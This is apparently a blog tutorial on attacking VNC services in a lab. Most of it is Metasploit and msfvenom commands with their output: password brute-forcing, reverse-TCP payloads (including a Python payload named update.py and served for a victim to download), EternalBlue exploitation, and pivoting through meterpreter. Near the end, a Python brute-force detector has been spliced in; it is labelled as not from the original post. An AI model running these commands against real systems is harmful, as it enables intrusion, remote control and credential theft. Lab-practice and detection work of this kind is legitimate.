Jirairya

VNC Attacks

2017-10-16
hack sec

A few VNC attack techniques.

Installation

Install vncserver:

sudo apt-get install vnc4server

Set the vncserver password:

sudo vncpasswd

Set the window size used for VNC connections:

b404@ubuntu:~$ sudo vncserver :1 -geometry 1024x768 -depth 24

Check that VNC is listening:

sudo netstat -tnl | grep 5901

Connect to the VNC server from Windows:

Scanning the target IP

Scan the target:

msf > db_nmap -sT 192.168.222.147

Query VNC information:

nmap -p 5901 -script vnc-info 192.168.222.147

Brute force

Brute-force the password with msf's VNC login module:

msf > use auxiliary/scanner/vnc/vnc_login 

msf auxiliary(vnc_login) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147

msf auxiliary(vnc_login) > set RPORT 5901
RPORT => 5901

msf auxiliary(vnc_login) > set pass_file /root/Desktop/pass.txt
pass_file => /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

The dictionary attack succeeds and the password is 213213; log in with it:

vncviewer 192.168.222.147:5901

Attacking with a VNC payload

Generate a VNC payload with msfvenom:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.222.146 lport=44455 -f exe > /var/www/html/vnc.exe

Start msf and set up a listener with the multi/handler exploit module:

msf > use exploit/multi/handler
 
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.222.146
lhost => 192.168.222.146

msf exploit(handler) > set lport 44455
lport => 44455

msf exploit(handler) > set viewonly false
viewonly => false
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.222.146:44455 

When the vnc.exe payload runs on the target machine, the listener catches the connection and opens vncviewer:

Obtaining a VNC session through meterpreter

Use the following commands to scan the target machine for the EternalBlue (MS17-010) vulnerability:

msf > use auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.222.136
RHOSTS => 192.168.222.136
msf auxiliary(smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_DOPU  true             yes       Check for DOUBLEPULSAR on vulnerable hosts
   RHOSTS      192.168.222.136  yes       The target address range or CIDR identifier
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

When the scan reports the EternalBlue vulnerability, attack with msf's exploit module:

msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
 
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set RHOST 192.168.222.136
RHOST => 192.168.222.136

msf exploit(ms17_010_eternalblue) > set LHOST 192.168.222.146
LHOST => 192.168.222.146

msf exploit(ms17_010_eternalblue) > run

Once a meterpreter session comes back over the reverse connection, the VNC DLL can be injected in stages with run vnc:

VNC attacks over ssh

Setting up the environment

Attack topology diagram

Set a static IP:

sudo vim /etc/network/interfaces

After configuring, test whether the hosts can ping each other:

Use PuTTY to set up ssh port forwarding and connect to VNC through the tunnel:

VNC connection succeeded:

Attacking Linux with msfvenom

Generate the payload with msfvenom:

root@kali:~# msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.222.146 lport=555 > /root/Desktop/update.py

Start the apache2 service and place update.py in the web root to simulate a user downloading it:

wget http://192.168.222.146/update.py

Open a listener (in msfconsole) for the msfvenom payload:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.222.146
LHOST => 192.168.222.146
msf exploit(handler) > set LPORT 555
LPORT => 555
msf exploit(handler) > exploit

Check the network interfaces:

VNC attacks from within meterpreter

Add a route so that the attacking machine can reach the victim's network segment:

msf exploit(handler) > use post/multi/manage/autoroute 
msf post(autoroute) > set session 1
session => 1
msf post(autoroute) > exploit 

ARP scan:

msf auxiliary(tcp) > use auxiliary/scanner/discovery/arp_sweep

TCP port scan:

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.0.20

set threads 10

exploit

Brute-force VNC:

msf auxiliary(tcp) > use auxiliary/scanner/vnc/vnc_login 

msf auxiliary(vnc_login) > set rhosts 10.0.0.20
rhosts => 10.0.0.20

msf auxiliary(vnc_login) > set RPORT 5901
RPORT => 5901

msf auxiliary(vnc_login) > set PASS_FILE /root/Desktop/pass.txt
PASS_FILE => /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run

The brute force recovers the password 213213; forward the port:

meterpreter > portfwd add -l 6000 -p 5901 -r 10.0.0.20

-l: local listening port

-p: remote port to connect to

-r: address of the remote host to connect to
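As a defender-side counterpart to the two VNC brute-force runs above (the vnc_login module against 192.168.222.147:5901 and again against 10.0.0.20:5901), here is an added Python example, not from the original post, that scans Xvnc-style server log lines for a burst of authentication failures from one source and notes whether that source later got a connection through. The log lines are constructed for the example, and the format is assumed to follow the layout of Xvnc's ~/.vnc/<host>:<display>.log (a date line followed by space-indented events).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the style of Xvnc's ~/.vnc/<host>:1.log (not a real capture):
# a date line, then space-indented events that happened at that timestamp.
SAMPLE_LOG = """\
Mon Oct 16 10:00:01 2017
 Connections: accepted: 192.168.222.146::40110
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 192.168.222.146::40110 (Authentication failure)
Mon Oct 16 10:00:02 2017
 Connections: closed: 192.168.222.146::40112 (Authentication failure)
Mon Oct 16 10:00:03 2017
 Connections: closed: 192.168.222.146::40114 (Authentication failure)
Mon Oct 16 10:00:04 2017
 Connections: closed: 192.168.222.146::40116 (Clean disconnection)
Mon Oct 16 10:30:00 2017
 Connections: closed: 192.168.222.1::51000 (Authentication failure)
"""

DATE_RE = re.compile(r"^\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}$")
CLOSED_RE = re.compile(r"^ Connections: closed: (\S+?)::\d+ \((.*)\)$")

def parse_events(log_text):
    """Yield (timestamp, source_ip, close_reason) for each closed connection."""
    current = None
    for line in log_text.splitlines():
        if DATE_RE.match(line):
            current = datetime.strptime(line, "%a %b %d %H:%M:%S %Y")
        elif current is not None:
            m = CLOSED_RE.match(line)
            if m:
                yield current, m.group(1), m.group(2)

def detect_bruteforce(log_text, threshold=3, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold auth failures inside a sliding window.
    Returns {ip: {"failures": peak count, "followed_by_success": bool}}; the
    flag is set when the same IP later closes a connection for any reason other
    than an auth failure, i.e. one of the guesses most likely got through."""
    failures = defaultdict(list)
    alerts = {}
    for ts, ip, reason in sorted(parse_events(log_text)):
        if reason == "Authentication failure":
            failures[ip].append(ts)
            recent = [t for t in failures[ip] if ts - t <= window]
            if len(recent) >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "followed_by_success": False})
                entry["failures"] = max(entry["failures"], len(recent))
        elif ip in alerts:
            alerts[ip]["followed_by_success"] = True
    return alerts
```

Tune threshold and window to the normal rate of mistyped passwords on the host; a single failure from 192.168.222.1 in the sample is correctly left alone.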

References:

  • https://websistent.com/how-to-use-putty-to-create-a-ssh-tunnel/
  • http://www.hackingarticles.in/vnc-tunneling-ssh/
  • http://www.hackingarticles.in/vnc-pivoting-meterpreter/
